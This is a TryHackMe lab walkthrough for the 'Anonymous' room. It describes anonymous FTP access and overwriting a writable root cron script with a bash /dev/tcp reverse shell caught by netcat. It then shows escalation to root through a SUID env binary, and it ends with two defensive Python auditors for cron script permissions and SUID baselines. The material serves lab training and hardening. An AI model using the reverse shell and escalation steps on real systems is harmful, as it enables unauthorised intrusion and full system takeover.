TryHackMe | Anonymous WriteUp / Walkthrough (English)
Anonymous
Room link: https://tryhackme.com/room/anonymous
- First, run an nmap scan of all the target's ports: sudo nmap -p- IP. From this scan you will be able to answer question 1.
- Then run another nmap scan against the 4 ports you discovered in the previous scan: sudo nmap -sV -p 21,22,139,445 IP. That will let you answer questions 2 and 3.
- sudo nmap -p445 IP --script smb-enum-shares will reveal the answer to question 4.
- Now we need to get access to the target system. From what we have, we will try to get in via SMB, FTP, or SSH. First, we try to log in to the FTP server anonymously with ftp IP, and indeed it works. There is a folder called scripts containing 3 files. Download the 3 files to your machine using get.
- After looking into the files, it is clear that clean.sh is a script that deletes all files in /tmp and then writes feedback to removed_files.log. to_do.txt is just a note and is not needed.
- We can notice that the log file's contents grow over time, which means the script gets executed frequently. This makes us assume it is run by cron. The file's permissions allow us to edit it, so we will take advantage of this by executing the one-liner reverse shell bash -i >& /dev/tcp/IP/4242 0>&1. Run vim clean.sh, paste the one-liner into it with #!/bin/bash added at the top of the file, then upload it to the FTP server with put.
- For the reverse shell to work we need to set up a listener with nc -nlvp 4242; make sure you specify the same port as in the one-liner. After some time you will receive a shell from the target machine. In the home directory you will find the first flag ✨.
- Now we need to get the root flag, which requires root privileges. Looking at the cron jobs, nothing is interesting. Also, sudo -l requires a password which we don't have. (Note: the first time you try to run sudo -l it will not work because it needs a terminal session; spawn one with python -c 'import pty; pty.spawn("/bin/bash")'.)
- Another type of file commonly used for privilege escalation when misconfigured is setuid files. To search for setuid files on a system: find / -perm -4000 2>/dev/null. /dev/null is a virtual device that discards anything written to it, so 2>/dev/null redirects the command's error output (such as permission-denied messages) to /dev/null.
- There are quite a lot of binaries with the SUID bit set. Browse to https://gtfobins.github.io/ to identify which binaries, and which commands, can be used for privilege escalation. After going through the list of identified binaries, most of them (like mount etc.) require sudo (and a password, which we don't have). The only option that does not require sudo is "/usr/bin/env".
- To use env you only need to execute the second line shown there, as the first line creates a local SUID copy of the binary, which we already have. Now cd /usr/bin, then ./env /bin/sh -p and you will instantly get a root shell. cd /root and retrieve the root flag ✨.
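The weakness exploited in the steps above is a root cron job that runs a script the FTP user is allowed to modify. As an added example that is not part of the original writeup, the Python script below audits /etc/crontab-style entries and flags any invoked script that is group- or world-writable, or that runs as root while being owned by someone else. The crontab text, the file names and the temporary files are constructed for the demo.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines (m h dom mon dow user cmd).
    Comments, blank lines and VAR=value assignments are skipped. Per-user crontabs
    (which have no user field) are not covered by this parser."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0] or len(fields) < 7:
            continue
        yield fields[5], fields[6]


def script_path(command):
    """The program a cron entry executes: the command's first token."""
    return command.split()[0]


def audit_script(path, cron_user):
    """Return findings for one cron-invoked script; an empty list means clean."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing: cron would run whatever is later created at this path"]
    findings = []
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if cron_user == "root" and st.st_uid != 0:
        findings.append(f"runs as root but is owned by uid {st.st_uid}")
    return findings


def audit_crontab(text):
    """Map each cron-invoked script path to its list of findings."""
    return {script_path(cmd): audit_script(script_path(cmd), user)
            for user, cmd in parse_system_crontab(text)}


def run_demo():
    """Build a constructed environment mirroring the room: a root cron job that
    runs a cleanup script other users can write. Returns findings keyed by
    script basename so the result is independent of the temp directory name."""
    tmp = tempfile.mkdtemp()
    clean = os.path.join(tmp, "clean.sh")         # writable by everyone (the flaw)
    rotate = os.path.join(tmp, "rotate_logs.sh")  # owner-writable only (clean)
    for path, mode in ((clean, 0o777), (rotate, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n# constructed placeholder body\n")
        os.chmod(path, mode)
    crontab = (
        "# constructed /etc/crontab sample\n"
        "SHELL=/bin/sh\n"
        f"* * * * * root {clean}\n"
        f"0 6 * * * root {rotate} --keep 7\n"
    )
    return {os.path.basename(p): f for p, f in audit_crontab(crontab).items()}


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(name, "->", findings or ["ok"])
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; any script it reports should be made root-owned and mode 0755 (or 0700), which removes the write path the walkthrough relies on.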
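From a hardening perspective, the counterpart to the find command above is a periodic SUID inventory compared against a known-good baseline, so that a stray SUID bit on something like env is caught before anyone needs it. As an added example that is not part of the original writeup, the Python script below does that over a constructed temporary tree; the EXPECTED_SUID baseline and the file names are illustrative assumptions. Directories that cannot be read are skipped, which is what 2>/dev/null achieves for find on the page.

```python
import os
import stat
import tempfile

# Constructed, illustrative baseline of SUID binaries a host is expected to carry.
# A real baseline is taken from a known-good image of the same distribution.
EXPECTED_SUID = {"passwd", "sudo", "su"}


def find_suid(root):
    """Walk `root` and return the paths of regular files with the setuid bit set.
    Unreadable directories are silently skipped (the Python equivalent of
    discarding find's permission-denied errors with 2>/dev/null)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, expected=EXPECTED_SUID):
    """Filter the inventory down to SUID files absent from the baseline."""
    return [p for p in paths if os.path.basename(p) not in expected]


def run_demo():
    """Build a constructed tree: passwd (expected SUID), env (unexpected SUID,
    the misconfiguration from the room) and ls (no SUID bit)."""
    tmp = tempfile.mkdtemp()
    layout = {"bin/passwd": 0o4755, "bin/env": 0o4755, "bin/ls": 0o755}
    for rel, mode in layout.items():
        path = os.path.join(tmp, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n# constructed placeholder\n")
        os.chmod(path, mode)  # setting u+s on a file you own needs no privilege
    found = find_suid(tmp)
    return {
        "suid": [os.path.basename(p) for p in found],
        "unexpected": [os.path.basename(p) for p in unexpected_suid(found)],
    }


if __name__ == "__main__":
    report = run_demo()
    print("SUID files:", report["suid"])
    print("Not in baseline:", report["unexpected"])
```

Run find_suid("/") from a root cron job and alert on anything unexpected_suid returns; an env binary in that list is the finding to act on, and chmod u-s /usr/bin/env closes the path this walkthrough uses.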